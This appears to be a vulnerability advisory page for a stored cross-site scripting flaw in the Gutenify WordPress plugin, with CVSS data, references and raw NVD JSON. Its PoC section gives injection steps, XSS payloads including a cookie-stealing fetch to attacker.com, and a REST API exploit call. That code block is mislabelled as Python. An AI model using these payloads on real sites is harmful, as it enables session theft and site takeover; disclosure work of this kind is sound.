CVE-2025-8605

Description

The Gutenify – Visual Site Builder Blocks & Site Templates. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block attributes in all versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Gutenify插件所有版本 <= 1.5.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-8605 Stored XSS PoC
// Target: Gutenify WordPress Plugin <= 1.5.9
// Attack Vector: Inject malicious JavaScript via block attributes

// Method 1: Via WordPress Block Editor
// 1. Login as Contributor or higher role
// 2. Create/Edit a post or page
// 3. Add a Gutenify block (e.g., Button, Heading, etc.)
// 4. In block settings, inject XSS payload in any text attribute field:
// Payload: <img src=x onerror=alert(document.cookie)>
// or: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
// 5. Save/Publish the post
// 6. Any user viewing this page will execute the injected script

// Method 2: REST API Exploitation (if available)
const payload = {
    'type': 'wp_block',
    'content': {
        'raw': '<!-- wp:gutenify/button {"text":"Click Me<img src=x onerror=alert(document.domain)>"} -->\n<div class="wp-block-gutenify-button">Button</div>\n<!-- /wp:gutenify/button -->'
    }
};

fetch('/wp-json/wp/v2/posts', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'X-WP-Nonce': wpApiSettings.nonce
    },
    body: JSON.stringify(payload)
});

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-8605
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-8605
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-8605/
[4] VulDB https://vuldb.com/cve/CVE-2025-8605
[5] https://wordpress.org/plugins/gutenify/#developers
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/853b86ca-0231-4b1c-b1d2-b8c23dbdc3c5?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-8605", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:53.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gutenify – Visual Site Builder Blocks & Site Templates. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block attributes in all versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wordpress.org/plugins/gutenify/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/853b86ca-0231-4b1c-b1d2-b8c23dbdc3c5?source=cve", "source": "[email protected]"}]}}